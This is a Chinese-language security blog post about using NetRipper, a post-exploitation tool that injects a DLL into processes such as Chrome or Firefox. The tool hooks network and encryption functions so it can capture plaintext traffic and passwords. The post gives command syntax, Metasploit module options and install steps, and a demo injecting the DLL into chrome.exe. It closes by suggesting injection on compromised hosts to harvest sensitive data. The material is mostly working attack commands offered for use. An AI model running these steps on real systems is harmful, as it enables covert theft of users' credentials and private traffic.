红队攻防之DLL注入获取内存中的密码

释放双眼,带上耳机,听听看~!

## 0X01 NetRipper

NetRipper是针对Windows系统的后期开发工具,其使用API挂钩来拦截低特权用户的网络流量和与加密相关的功能,从而能够在加密之前/解密之后捕获纯文本流量和加密流量。

0X02 用法

Injection: NetRipper.exe DLLpath.dll processname.exe  
Example:   NetRipper.exe DLL.dll firefox.exe  

Generate DLL:

  -h,  --help          Print this help message  
  -w,  --write         Full path for the DLL to write the configuration data  
  -l,  --location      Full path where to save data files (default TEMP)  

Plugins:

  -p,  --plaintext     Capture only plain-text data. E.g. true  
  -d,  --datalimit     Limit capture size per request. E.g. 4096  
  -s,  --stringfinder  Find specific strings. E.g. user,pass,config  

Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass  

Metasploit模块

msf exploit(multi/handler) > use post/windows/gather/netripper/netripper 
msf post(windows/gather/netripper/netripper) > show options

Module options (post/windows/gather/netripper/netripper):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DATALIMIT     65535            no        The number of bytes to save from requests/responses
   DATAPATH      TEMP             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   DLLPATH                        no        Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...
   PLAINTEXT     false            no        True to save only plain-text data
   PROCESSIDS                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                        yes       The session to run this module on.
   STRINGFINDER  DEFAULT          no        Search for specific strings in captured data

设置PROCESSNAMES或PROCESSIDS并运行。

Metasploit安装(Kali)

  1. mkdir / usr / share / metasploit-framework / modules / post / windows / gather / netripper
  2. cp Metasploit / netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
  3. cp x86 / DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
  4. cp x64 / DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

Metasploit安装(后备箱)

  1. mkdir / opt / metasploit-framework / modules / post / windows / gather / netripper
  2. cp Metasploit / netripper.rb /opt/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
  3. cp x86 / DLL.x86.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
  4. cp x64 / DLL.x64.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

0x03 操作演示

执行命令,将DLL文件注入到chrome浏览器里

 NetRipper.x64.exe "C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll" chrome.exe

登录一个网站就行,查看temp

通过POWERSHELL也行

0x04 思路

可以在入侵主机上注入进程进而获取重要信息,可以结合MSF进行操作

0x05 参考项目主页

https://github.com/NytroRST/NetRipper

人已赞赏
安全工具安全教程

移动安全开发指南-保护内部资源

2019-10-24 17:04:29

安全工具

雷神众测漏洞预警周报 2019.10.14-10.20-8

2019-10-25 15:29:55

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索